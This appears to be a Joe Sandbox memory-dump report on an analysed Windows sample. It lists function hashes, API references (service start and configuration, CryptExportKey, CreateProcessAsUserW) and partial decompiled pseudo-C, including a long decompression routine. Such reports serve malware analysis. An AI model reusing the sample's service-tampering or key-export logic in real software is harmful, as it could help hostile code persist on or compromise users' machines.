Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Crypt$ContextDestroyRelease
String ID:
API String ID: 1322390979-0
Opcode ID: 7ac393b5e7cef98cb90a7289967f45810b03965a6a80fce8a8eb111b3da5f42b
Instruction ID: 20ad0121199d8f29ff6ea3265dff77afa0b6aef8607355120367301d2187ec8d
Opcode Fuzzy Hash: 7ac393b5e7cef98cb90a7289967f45810b03965a6a80fce8a8eb111b3da5f42b
Instruction Fuzzy Hash: 20D0C93015A001BFDB252F30AE48B463B64AB48342B510020B102E5CF0DF6094F2EA14

Uniqueness

Uniqueness Score: 0.02%

Function 0011FE54, Relevance: 4.5, APIs: 3, Instructions: 9
memoryserviceUNIQUE

C-Code - Quality: 48%

			E0011FE54(void* __ebx, void* __edi) {
				void* __esi;
				void* _t12;
				void* _t14;
				int _t15;

				_t12 = __edi;
				 *0x124aac();
				HeapFree(GetProcessHeap(), 0, _t14);
				_t20 = __ebx;
				if(__ebx == 0) {
					_t15 = 0;
					__eflags = 0;
				} else {
					_t15 = StartServiceW();
					CloseServiceHandle(__ebx);
				}
				L0011FD00(_t12, _t15, _t20);
				CloseServiceHandle(_t12);
				return _t15;
			}

0x0011fe54
0x0011fe54
0x0011fe64
0x0011fe6a
0x0011fe6c
0x0011fe84
0x0011fe84
0x0011fe6e
0x0011fe7a
0x0011fe7c
0x0011fe7c
0x0011fe88
0x0011fe8e
0x0011fe9c

APIs

ChangeServiceConfig2W.ADVAPI32 ref: 0011FE54
GetProcessHeap.KERNEL32(00000000), ref: 0011FE5D
HeapFree.KERNEL32(00000000), ref: 0011FE64
CloseServiceHandle.ADVAPI32(?,?,startedradar,startedradar,00000012,00000010,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0011FE8E

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: HeapService$ChangeCloseConfig2FreeHandleProcess
String ID:
API String ID: 798051021-0
Opcode ID: f2933855080a77faffb884158123de50a461b71df2b729468c32e5444cd2ca08
Instruction ID: e41cd60c02617f74522bce3ff5dce15e9d641e1fe1d01ad63e0e4cfd76864456
Opcode Fuzzy Hash: f2933855080a77faffb884158123de50a461b71df2b729468c32e5444cd2ca08
Instruction Fuzzy Hash: 10C04C32245750FBD7341BE15D8D7AE3D2DAB08703F050428B606858A18A7244A28721

Uniqueness

Uniqueness Score: 100.00%

Function 00112089, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13encryptionCOMMON

APIs

CryptExportKey.ADVAPI32(?,?,00000001,00000040,?), ref: 0011209B

Strings

l, xrefs: 00112089

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: CryptExport
String ID: l
API String ID: 3389274496-2517025534
Opcode ID: dcd69f6ca07ecd755da0eb4dba10510d0d708e0016cbba4efd2742b1b90e772e
Instruction ID: 16b7a84f329516da5eb29120ca1feccb9ffadc4fe68816f8fbeacbbfa0daa7d2
Opcode Fuzzy Hash: dcd69f6ca07ecd755da0eb4dba10510d0d708e0016cbba4efd2742b1b90e772e
Instruction Fuzzy Hash: EFD012F0200308FAF7394B60CD45FFB356CA704700F2001197202A64C0D6F5E5D19930

Uniqueness

Uniqueness Score: 0.02%

Function 0011FA14, Relevance: 3.0, APIs: 2, Instructions: 20serviceCOMMON

APIs

EnumServicesStatusExW.ADVAPI32(?,?,00000030,00000003), ref: 0011FA27
GetLastError.KERNEL32(?,?,00000030,00000003), ref: 0011FA35

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: EnumErrorLastServicesStatus
String ID:
API String ID: 3481363347-0
Opcode ID: 848bf8ee9e72c5e84b424ac7a443498e5b9cdfb24f5f193e5ae4b65ad2a59f44
Instruction ID: bae3516a538884dfc8c807c074eea1f15ba2aa89c5ded595caf48f11fd699812
Opcode Fuzzy Hash: 848bf8ee9e72c5e84b424ac7a443498e5b9cdfb24f5f193e5ae4b65ad2a59f44
Instruction Fuzzy Hash: A4E0C230F046046BE3394B42DC68FBBA46CEB98B00F10003CF105E1540D3A04EC18A65

Uniqueness

Uniqueness Score: 0.03%

Function 00112104, Relevance: 1.5, APIs: 1, Instructions: 21encryptionCOMMON

APIs

CryptReleaseContext.ADVAPI32(00000000), ref: 00112147

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: 0fc5854c36b144b160cdc65f9be82d9dffcfdfb9b07803ca626de1eda45996ed
Instruction ID: 813c0e134ae9d274f41b6f30d3d4033755d7a991e76332dc7530c8d7f2f86be8
Opcode Fuzzy Hash: 0fc5854c36b144b160cdc65f9be82d9dffcfdfb9b07803ca626de1eda45996ed
Instruction Fuzzy Hash: B3C0C030304001BFC6341F10BC043613304D304713F000021F906D1CA0CF11C4F086C0

Uniqueness

Uniqueness Score: 0.03%

Function 001120E5, Relevance: 1.5, APIs: 1, Instructions: 11encryptionCOMMON

APIs

CryptAcquireContextW.ADVAPI32 ref: 001120E7

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: AcquireContextCrypt
String ID:
API String ID: 3951991833-0
Opcode ID: 2be1369fd0499c43a23e0bf2cfc30e93900e9574ae5f13cbfb63c8e5c178912e
Instruction ID: 273499affc15d8f6a16b37b04cc0a8718ea26ca9c22d594191f2596e6ed37fc3
Opcode Fuzzy Hash: 2be1369fd0499c43a23e0bf2cfc30e93900e9574ae5f13cbfb63c8e5c178912e
Instruction Fuzzy Hash: E8B0923530501A9719285AA939092B6724896096D671045A6AA0EC6E60EA51C8F04EC2

Uniqueness

Uniqueness Score: 0.03%

Function 00111F72, Relevance: 1.5, APIs: 1, Instructions: 5processCOMMON

APIs

CreateProcessAsUserW.ADVAPI32 ref: 00111F72

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: 90adfabe80cedc2bc56d989c154ee13697cd877237492521abb1b10c73246186
Instruction ID: 49fdf833adee1cb6ee1758163bf1a6f9e85ba3b87091c520e0bdb0e811c30eed
Opcode Fuzzy Hash: 90adfabe80cedc2bc56d989c154ee13697cd877237492521abb1b10c73246186
Instruction Fuzzy Hash: 89B09235400000EB8B2A0BA09A0C49C7A75AB883013210010E00282920CE304AE2AA00

Uniqueness

Uniqueness Score: 0.04%

Function 001153DF, Relevance: .5, Instructions: 487
COMMONCrypto

C-Code - Quality: 68%

			E001153DF(signed int __ebx, signed int __edx, signed int __edi, signed int __esi) {
				signed int _t595;
				signed int _t596;
				signed int _t598;
				void* _t599;
				signed int _t609;
				signed int* _t619;
				signed int _t622;
				signed int _t639;
				signed int _t641;
				signed int _t646;
				signed char _t652;
				signed int _t655;
				signed int _t657;
				signed int _t660;
				signed int _t666;
				signed int _t669;
				signed int _t671;
				void* _t673;
				signed int _t676;
				signed int _t680;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				unsigned int _t693;
				signed int _t694;
				signed int _t696;
				signed int _t697;
				signed int _t701;
				signed int _t711;
				signed int _t716;
				signed int _t718;
				signed int _t721;
				signed int _t723;
				signed int _t724;
				intOrPtr _t736;
				intOrPtr _t737;
				intOrPtr _t738;
				signed int _t741;
				signed int _t745;
				void* _t751;
				signed int _t756;
				signed int _t758;
				signed int _t762;
				signed int _t766;
				signed int _t769;
				signed int _t773;
				signed int _t778;
				signed int _t782;
				signed int _t783;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				signed int _t795;
				signed int _t796;
				signed int _t798;
				signed int _t799;
				signed int _t806;
				signed int _t809;
				intOrPtr* _t811;
				void* _t812;
				signed int _t823;
				signed int _t825;
				intOrPtr _t827;
				signed int _t831;
				intOrPtr* _t833;
				signed int _t834;
				signed int _t842;
				signed int _t845;
				signed int _t848;
				signed int _t850;
				signed int _t851;
				signed int _t860;
				signed int _t863;
				void* _t864;
				void* _t865;
				void* _t866;
				void* _t867;
				void* _t868;
				void* _t869;
				void* _t870;
				void* _t871;
				signed char _t872;
				signed char _t875;
				intOrPtr _t877;
				signed int _t880;
				signed int _t881;
				signed char _t883;
				signed int _t884;
				signed int _t885;
				signed char _t890;
				signed int _t892;
				void* _t893;
				signed int _t894;
				signed int _t897;
				signed int _t898;
				signed char _t899;
				intOrPtr _t901;
				intOrPtr _t903;
				void* _t906;
				signed char _t907;
				signed char _t908;
				signed int _t909;
				signed int _t913;
				signed char _t918;
				signed int _t919;
				signed int _t920;
				signed int _t923;
				signed int _t928;
				signed int _t932;
				signed char _t936;
				signed int _t937;
				signed char _t940;
				signed int _t941;
				signed int _t949;
				signed int _t964;
				signed int _t968;
				signed int _t970;
				signed int _t974;
				signed int* _t975;
				signed char* _t980;
				signed int _t981;
				signed int _t986;
				unsigned int _t987;
				signed int _t988;
				signed int _t989;
				signed int _t992;
				signed int _t993;
				signed int _t995;
				signed int _t997;
				signed int _t998;
				signed int _t999;
				signed int _t1002;
				signed int _t1006;
				signed int _t1012;
				signed int _t1013;
				int _t1014;
				int _t1016;
				signed int _t1017;
				unsigned int _t1020;
				void* _t1024;
				intOrPtr _t1025;
				signed int _t1026;
				signed int _t1029;
				signed int _t1031;
				signed int _t1032;
				signed int _t1034;
				int _t1039;
				signed int _t1040;
				signed int _t1042;
				unsigned int _t1043;
				signed int _t1044;
				void* _t1045;
				void* _t1047;
				signed int _t1049;
				unsigned int _t1052;
				signed int _t1053;
				unsigned int _t1055;
				signed int _t1056;
				signed int _t1064;
				signed char _t1065;
				void* _t1066;
				void* _t1068;

				L0:
				while(1) {
					L0:
					_t1050 = __esi;
					_t1029 = __edi;
					_t846 = __ebx;
					if(__ebx >=  *(_t1066 - 0x20)) {
						break;
					}
					L1:
					_t872 = __esi;
					_t846 = __ebx + 1;
					_t987 = __edx | ( *__ebx & 0x000000ff) << __esi;
					 *(_t1066 - 0x18) = _t846;
					_t1064 = __esi + 8;
					 *(_t1066 - 4) = _t987;
					if(_t1064 < 0xf) {
						L227:
						_t646 =  *((short*)(_t1029 + 0xf00 + (_t987 & 0x000003ff) * 2));
						 *(_t1066 - 0x24) = _t646;
						__eflags = _t646;
						if(_t646 < 0) {
							L231:
							__eflags = _t1064 - 0xa;
							if(_t1064 <= 0xa) {
								continue;
							} else {
								L232:
								L233:
								 *(_t1066 - 0x1c) = _t872;
								while(1) {
									L234:
									_t872 =  *((short*)(_t1029 + 0x1700 + ((_t987 >> _t872 & 0x00000001) +  !( *(_t1066 - 0x24))) * 2));
									_t652 =  *(_t1066 - 0x1c) + 1;
									 *(_t1066 - 0x24) = _t872;
									 *(_t1066 - 0x1c) = _t652;
									__eflags = _t872;
									if(_t872 >= 0) {
										goto L2;
									}
									L235:
									__eflags = _t1064 - _t652 + 1;
									if(_t1064 < _t652 + 1) {
										goto L0;
									} else {
										L236:
										_t872 =  *(_t1066 - 0x1c);
										continue;
									}
									goto L295;
								}
								goto L2;
							}
						} else {
							L228:
							_t845 = _t646 >> 9;
							__eflags = _t845;
							if(_t845 == 0) {
								continue;
							} else {
								L229:
								__eflags = _t1064 - _t845;
								if(_t1064 >= _t845) {
									goto L2;
								} else {
									L230:
									continue;
								}
							}
						}
					} else {
						while(1) {
							L2:
							_t655 =  *((short*)(_t1029 + 0xf00 + (_t987 & 0x000003ff) * 2));
							 *(_t1066 - 0x1c) = _t655;
							if(_t655 < 0) {
								goto L4;
							}
							L3:
							_t872 = _t655 >> 9;
							_t660 = _t655 & 0x000001ff;
							L8:
							_t988 = _t987 >> _t872;
							_t1050 = _t1064 - _t872;
							_t875 =  *(0x121090 + _t660 * 4);
							_t595 =  *(0x121110 + _t660 * 4);
							 *(_t1066 - 4) = _t988;
							 *(_t1066 - 0x38) = _t875;
							 *(_t1066 - 0x28) = _t595;
							if(_t875 == 0) {
								L14:
								_t877 =  *(_t1066 - 0x10) -  *((intOrPtr*)(_t1066 + 0xc));
								 *((intOrPtr*)(_t1066 - 0x48)) = _t877;
								if(_t595 <= _t877 || ( *(_t1066 + 0x18) & 0x00000004) == 0) {
									L16:
									_t1029 =  *(_t1066 - 0x14);
									_t880 = (_t877 - _t595 &  *(_t1066 - 0x34)) +  *((intOrPtr*)(_t1066 + 0xc));
									 *(_t1066 - 0xc) = _t880;
									_t662 =  >  ?  *(_t1066 - 0x10) : _t880;
									_t881 =  *(_t1066 - 8);
									_t663 = ( >  ?  *(_t1066 - 0x10) : _t880) + _t881;
									_t1081 = ( >  ?  *(_t1066 - 0x10) : _t880) + _t881 -  *((intOrPtr*)(_t1066 - 0x40));
									if(( >  ?  *(_t1066 - 0x10) : _t880) + _t881 <=  *((intOrPtr*)(_t1066 - 0x40))) {
										L20:
										__eflags = _t881 - 9;
										if(_t881 < 9) {
											L29:
											goto 0x3112f7;
											asm("int3");
											do {
												L31:
												_t881 = _t881 - 3;
												 *_t1029 =  *_t988 & 0x000000ff;
												 *((char*)(_t1029 + 1)) =  *(_t988 + 1) & 0x000000ff;
												_t666 =  *(_t988 + 2) & 0x000000ff;
												_t988 = _t988 + 3;
												 *(_t1029 + 2) = _t666;
												_t1029 = _t1029 + 3;
												__eflags = _t881 - 2;
											} while (_t881 > 2);
											 *(_t1066 - 0x10) = _t1029;
											_t1029 =  *(_t1066 - 0x14);
											 *(_t1066 - 0xc) = _t988;
											_t988 =  *(_t1066 - 4);
											 *(_t1066 - 8) = _t881;
											__eflags = _t881;
											if(_t881 > 0) {
												L33:
												goto 0x31130b;
												asm("int3");
												_t827 =  *_t666;
												 *_t1029 = _t827;
												_t1029 =  *(_t1066 - 0x14);
												__eflags = _t881 - 1;
												if(_t881 > 1) {
													goto L35;
												}
												goto L37;
											}
										} else {
											L21:
											__eflags = _t881 -  *(_t1066 - 0x28);
											if(_t881 >  *(_t1066 - 0x28)) {
												goto L29;
											} else {
												L22:
												_t1049 =  *(_t1066 - 0xc);
												_t964 =  *(_t1066 - 0x10);
												_t831 = (_t881 & 0xfffffff8) + _t1049;
												 *(_t1066 - 0x24) = _t831;
												_t1026 = _t831;
												do {
													L23:
													 *_t964 =  *_t1049;
													_t833 =  *((intOrPtr*)(_t1049 + 4));
													_t1049 = _t1049 + 8;
													 *((intOrPtr*)(_t964 + 4)) = _t833;
													_t964 = _t964 + 8;
													__eflags = _t1049 - _t1026;
												} while (_t1049 < _t1026);
												_t988 =  *(_t1066 - 4);
												 *(_t1066 - 0x10) = _t964;
												_t881 =  *(_t1066 - 8) & 0x00000007;
												 *(_t1066 - 0xc) = _t1049;
												_t1029 =  *(_t1066 - 0x14);
												 *(_t1066 - 8) = _t881;
												__eflags = _t881 - 3;
												if(_t881 >= 3) {
													goto L29;
												} else {
													L25:
													__eflags = _t881;
													if(_t881 != 0) {
														L26:
														goto 0x3112e3;
														asm("int3");
														_t827 =  *_t833;
														 *_t1029 = _t827;
														_t1029 =  *(_t1066 - 0x14);
														__eflags = _t881 - 1;
														if(_t881 > 1) {
															L28:
															L35:
															goto 0x31131f;
															asm("int3");
															 *(_t988 + 1) =  *((intOrPtr*)(_t827 + 1));
															_t988 =  *(_t1066 - 4);
														}
														L37:
														_t83 = _t1066 - 0x10;
														 *_t83 =  *(_t1066 - 0x10) + _t881;
														__eflags =  *_t83;
													}
												}
											}
										}
										goto L38;
									} else {
										while(1) {
											L17:
											_t834 = _t881;
											_t881 = _t881 - 1;
											 *(_t1066 - 8) = _t881;
											if(_t834 == 0) {
												goto L38;
											}
											L18:
											if( *(_t1066 - 0x10) >=  *((intOrPtr*)(_t1066 - 0x40))) {
												L238:
												 *(_t1066 - 0xc) = 2;
												 *_t1029 = 0x35;
												goto L292;
											} else {
												L19:
												 *(_t1066 - 0x10) =  *(_t1066 - 0x10) + 1;
												 *((intOrPtr*)(_t1066 - 0x48)) =  *((intOrPtr*)(_t1066 - 0x48)) + 1;
												 *( *(_t1066 - 0x10)) =  *((intOrPtr*)(( *((intOrPtr*)(_t1066 - 0x48)) -  *(_t1066 - 0x28) &  *(_t1066 - 0x34)) +  *((intOrPtr*)(_t1066 + 0xc))));
												_t988 =  *(_t1066 - 4);
												continue;
											}
											goto L295;
										}
										while(1) {
											L38:
											_t883 =  *(_t1066 - 0x20) - _t846;
											__eflags = _t883 - 4;
											if(_t883 < 4) {
												goto L57;
											}
											L39:
											_t1029 =  *(_t1066 - 0x14);
											__eflags =  *((intOrPtr*)(_t1066 - 0x40)) -  *(_t1066 - 0x10) - 2;
											if( *((intOrPtr*)(_t1066 - 0x40)) -  *(_t1066 - 0x10) < 2) {
												goto L57;
											} else {
												L40:
												__eflags = _t1050 - 0xf;
												if(_t1050 < 0xf) {
													_t1002 =  *(_t846 + 1) & 0x000000ff;
													_t883 = _t1050;
													_t724 =  *_t846 & 0x000000ff;
													_t846 = _t846 + 2;
													 *(_t1066 - 0x18) = _t846;
													 *(_t1066 - 4) =  *(_t1066 - 4) | (_t1002 << 0x00000008 | _t724) << _t883;
													_t1050 = _t1050 + 0x10;
													__eflags = _t1050;
													_t988 =  *(_t1066 - 4);
												}
												_t595 =  *((short*)(_t1029 + 0x160 + (_t988 & 0x000003ff) * 2));
												 *(_t1066 - 8) = _t595;
												__eflags = _t595;
												if(_t595 < 0) {
													L44:
													goto 0x311333;
													asm("int3");
													asm("int3");
													asm("int3");
													do {
														L45:
														_t711 = _t988 >> _t883;
														_t883 = _t883 + 1;
														_t595 = (_t711 & 0x00000001) +  !_t846;
														_t846 =  *((short*)(_t1029 + 0x960 + _t595 * 2));
														__eflags = _t846;
													} while (_t846 < 0);
													 *(_t1066 - 8) = _t846;
													_t846 =  *(_t1066 - 0x18);
												} else {
													L43:
													_t883 = _t595 >> 9;
												}
												L47:
												_t987 = _t988 >> _t883;
												_t1064 = _t1050 - _t883;
												_t884 =  *(_t1066 - 8);
												 *(_t1066 - 4) = _t987;
												__eflags = _t884 & 0x00000100;
												if((_t884 & 0x00000100) != 0) {
													L83:
													_t885 = _t884 & 0x000001ff;
													 *(_t1066 - 8) = _t885;
													__eflags = _t885 - 0x100;
													if(_t885 != 0x100) {
														L219:
														_t673 = _t885 * 4 - 0x404;
														_t872 =  *(_t673 + 0x121010);
														_t595 =  *(_t673 + 0x121a48);
														 *(_t1066 - 0x38) = _t872;
														 *(_t1066 - 8) = _t595;
														__eflags = _t872;
														if(_t872 == 0) {
															L225:
															__eflags = _t1064 - 0xf;
															if(_t1064 >= 0xf) {
																L2:
																_t655 =  *((short*)(_t1029 + 0xf00 + (_t987 & 0x000003ff) * 2));
																 *(_t1066 - 0x1c) = _t655;
																if(_t655 < 0) {
																	goto L4;
																}
																goto L8;
															} else {
																L226:
																__eflags =  *(_t1066 - 0x20) - _t846 - 2;
																if( *(_t1066 - 0x20) - _t846 >= 2) {
																	L237:
																	_t989 =  *(_t846 + 1) & 0x000000ff;
																	_t676 =  *_t846 & 0x000000ff;
																	_t846 = _t846 + 2;
																	_t1029 =  *(_t1066 - 0x14);
																	_t872 = _t1064;
																	 *(_t1066 - 0x18) = _t846;
																	 *(_t1066 - 4) =  *(_t1066 - 4) | _t989 << _t1064 + 0x00000008 | _t676 << _t872;
																	_t1064 = _t1064 + 0x10;
																	_t987 =  *(_t1066 - 4);
																	do {
																		goto L2;
																	} while (_t1064 >= 0xf);
																	goto L226;
																} else {
																	goto L227;
																}
															}
														} else {
															L220:
															__eflags = _t1064 - _t872;
															if(_t1064 >= _t872) {
																L223:
																L224:
																_t1064 = _t1064 - _t872;
																_t680 = (_t595 << _t872) - 0x00000001 & _t987;
																_t987 = _t987 >> _t872;
																_t456 = _t1066 - 8;
																 *_t456 =  *(_t1066 - 8) + _t680;
																__eflags =  *_t456;
																 *(_t1066 - 4) = _t987;
																goto L225;
															} else {
																while(1) {
																	L221:
																	__eflags = _t846 -  *(_t1066 - 0x20);
																	if(_t846 >=  *(_t1066 - 0x20)) {
																		break;
																	}
																	L222:
																	_t595 = ( *_t846 & 0x000000ff) << _t1064;
																	_t846 = _t846 + 1;
																	_t872 =  *(_t1066 - 0x38);
																	_t987 = _t987 | _t595;
																	_t1050 = _t1064 + 8;
																	 *(_t1066 - 0x18) = _t846;
																	 *(_t1066 - 4) = _t987;
																	__eflags = _t1050 - _t872;
																	if(_t1050 < _t872) {
																		continue;
																	} else {
																		goto L223;
																	}
																	goto L295;
																}
																L262:
																 *_t1029 = 0x19;
																goto L285;
															}
														}
													} else {
														while(1) {
															L84:
															__eflags =  *(_t1029 + 0x14) & 0x00000001;
															if(( *(_t1029 + 0x14) & 0x00000001) != 0) {
																break;
															}
															L85:
															__eflags = _t1064 - 3;
															if(_t1064 >= 3) {
																L88:
																_t1050 = _t1064 - 3;
																_t693 = _t987 & 0x00000007;
																_t997 = _t987 >> 3;
																 *(_t1029 + 0x14) = _t693;
																_t694 = _t693 >> 1;
																__eflags = _t694;
																 *(_t1066 - 4) = _t997;
																 *(_t1066 - 0x1c) = _t1050;
																 *(_t1029 + 0x18) = _t694;
																if(_t694 != 0) {
																	L123:
																	__eflags = _t694 - 3;
																	if(_t694 == 3) {
																		L266:
																		 *(_t1066 - 0xc) = 0xffffffff;
																		 *_t1029 = 0xa;
																		goto L292;
																	} else {
																		L124:
																		__eflags = _t694 - 1;
																		if(_t694 != 1) {
																			L127:
																			_t897 = 0;
																			__eflags = 0;
																			while(1) {
																				L128:
																				 *(_t1066 - 8) = _t897;
																				__eflags = _t897 - 3;
																				if(_t897 >= 3) {
																					break;
																				}
																				L129:
																				_t595 =  *((char*)(_t897 + 0x121004));
																				 *(_t1066 - 0x1c) = _t595;
																				__eflags = _t1050 - _t595;
																				if(_t1050 >= _t595) {
																					L132:
																					_t1024 = _t1029 + _t897 * 4;
																					_t1043 =  *(_t1066 - 4);
																					 *(_t1024 + 0x2c) = (0x00000001 <<  *(_t1066 - 0x1c)) - 0x00000001 & _t1043;
																					_t806 =  *(_t1066 - 8);
																					_t936 =  *((char*)(_t806 + 0x121004));
																					_t1044 = _t1043 >> _t936;
																					_t1050 = _t1050 - _t936;
																					_t937 = _t806;
																					 *(_t1066 - 4) = _t1044;
																					 *(_t1066 - 0x1c) = _t1050;
																					 *(_t1024 + 0x2c) =  *(_t1024 + 0x2c) +  *((intOrPtr*)(0x121a38 + _t937 * 4));
																					_t997 = _t1044;
																					_t1029 =  *(_t1066 - 0x14);
																					_t897 = _t937 + 1;
																					continue;
																				} else {
																					while(1) {
																						L130:
																						__eflags = _t846 -  *(_t1066 - 0x20);
																						if(_t846 >=  *(_t1066 - 0x20)) {
																							break;
																						}
																						L131:
																						_t809 = ( *_t846 & 0x000000ff) << _t1050;
																						_t846 = _t846 + 1;
																						_t897 =  *(_t1066 - 8);
																						_t997 = _t997 | _t809;
																						_t1050 = _t1050 + 8;
																						 *(_t1066 - 0x18) = _t846;
																						 *(_t1066 - 4) = _t997;
																						_t595 =  *((char*)(_t897 + 0x121004));
																						 *(_t1066 - 0x1c) = _t595;
																						__eflags = _t1050 - _t595;
																						if(_t1050 < _t595) {
																							continue;
																						} else {
																							goto L132;
																						}
																						goto L295;
																					}
																					L248:
																					 *_t1029 = 0xb;
																					goto L285;
																				}
																				goto L295;
																			}
																			L133:
																			L134:
																			_t595 = memset(_t1029 + 0x1b80, 0, ??);
																			_t998 =  *(_t1066 - 4);
																			_t1068 = _t1068 + 0xc;
																			_t898 = 0;
																			__eflags = 0;
																			while(1) {
																				L135:
																				 *(_t1066 - 8) = _t898;
																				__eflags = _t898 -  *((intOrPtr*)(_t1029 + 0x34));
																				if(_t898 >=  *((intOrPtr*)(_t1029 + 0x34))) {
																					break;
																				}
																				L136:
																				__eflags = _t1050 - 3;
																				if(_t1050 >= 3) {
																					L139:
																					_t932 = _t998 & 0x00000007;
																					_t998 = _t998 >> 3;
																					_t1050 = _t1050 - 3;
																					 *(_t1066 - 4) = _t998;
																					 *(_t1066 - 0x1c) = _t1050;
																					_t595 =  *( *(_t1066 - 8) + 0x121a24) & 0x000000ff;
																					 *(_t1029 + 0x1b80 + _t595) = _t932;
																					_t898 =  *(_t1066 - 8) + 1;
																					continue;
																				} else {
																					while(1) {
																						L137:
																						__eflags = _t846 -  *(_t1066 - 0x20);
																						if(_t846 >=  *(_t1066 - 0x20)) {
																							break;
																						}
																						L138:
																						_t595 = ( *_t846 & 0x000000ff) << _t1050;
																						_t846 = _t846 + 1;
																						_t998 = _t998 | _t595;
																						 *(_t1066 - 0x18) = _t846;
																						_t1050 = _t1050 + 8;
																						 *(_t1066 - 4) = _t998;
																						__eflags = _t1050 - 3;
																						if(_t1050 < 3) {
																							continue;
																						} else {
																							goto L139;
																						}
																						goto L295;
																					}
																					L249:
																					 *_t1029 = 0xe;
																					goto L285;
																				}
																				goto L295;
																			}
																			L140:
																			 *((intOrPtr*)(_t1029 + 0x34)) = 0x13;
																			goto L141;
																		} else {
																			L125:
																			goto 0x3113af;
																			asm("int3");
																			asm("int3");
																			 *((intOrPtr*)(_t694 + 0x2c)) = 0x120;
																			L126:
																			_t811 = _t694 + 1 - 0x20;
																			 *_t811 =  *_t811 + _t811;
																			_t846 = _t846 + _t811;
																			_t812 = _t811 + 1;
																			 *_t812 =  *_t812 ^ _t812;
																			 *_t812 = _t812 +  *_t812;
																			 *0xde0 =  *0xde0 + _t812;
																			memset(_t812, ??, ??);
																			asm("movdqa xmm0, [0x121ae0]");
																			_t1068 = _t1068 + 0xc;
																			asm("movdqu [edi+0x40], xmm0");
																			asm("movdqu [edi+0x50], xmm0");
																			asm("movdqu [edi+0x60], xmm0");
																			asm("movdqu [edi+0x70], xmm0");
																			asm("movdqu [edi+0x80], xmm0");
																			asm("movdqu [edi+0x90], xmm0");
																			asm("movdqu [edi+0xa0], xmm0");
																			asm("movdqu [edi+0xb0], xmm0");
																			asm("movdqu [edi+0xc0], xmm0");
																			_t1045 = _t1029 + 0xd0;
																			asm("movdqa xmm0, [0x121af0]");
																			asm("movdqu [edi], xmm0");
																			asm("movdqu [edi+0x10], xmm0");
																			asm("movdqu [edi+0x20], xmm0");
																			asm("movdqu [edi+0x30], xmm0");
																			asm("movdqu [edi+0x40], xmm0");
																			asm("movdqu [edi+0x50], xmm0");
																			asm("movdqu [edi+0x60], xmm0");
																			asm("movdqa xmm0, [0x121ad0]");
																			asm("movdqu [edi+0x70], xmm0");
																			asm("movq [edi+0x80], xmm0");
																			 *((intOrPtr*)(_t1045 + 0x88)) = 0x8080808;
																			 *((intOrPtr*)(_t1045 + 0x8c)) = 0x8080808;
																			_t1029 =  *(_t1066 - 0x14);
																			while(1) {
																				L141:
																				_t696 =  *(_t1029 + 0x18);
																				__eflags = _t696;
																				if(_t696 < 0) {
																					break;
																				}
																				L142:
																				 *(_t1066 - 0xc) = 0x40 + _t696 * 0xda0 + _t1029;
																				memset(_t1066 - 0xd0, 0, 0x40);
																				memset( *(_t1066 - 0xc) + 0x120, 0, 0x800);
																				memset( *(_t1066 - 0xc) + 0x920, 0, 0x480);
																				_t899 = 0;
																				_t1068 = _t1068 + 0x24;
																				_t1012 = _t1029 + ( *(_t1029 + 0x18) + 0xb) * 4;
																				 *(_t1066 - 0x44) = _t1012;
																				__eflags =  *_t1012;
																				if( *_t1012 > 0) {
																					L143:
																					_t1029 =  *(_t1066 - 0xc);
																					do {
																						L144:
																						_t799 =  *(_t899 + _t1029) & 0x000000ff;
																						_t899 = _t899 + 1;
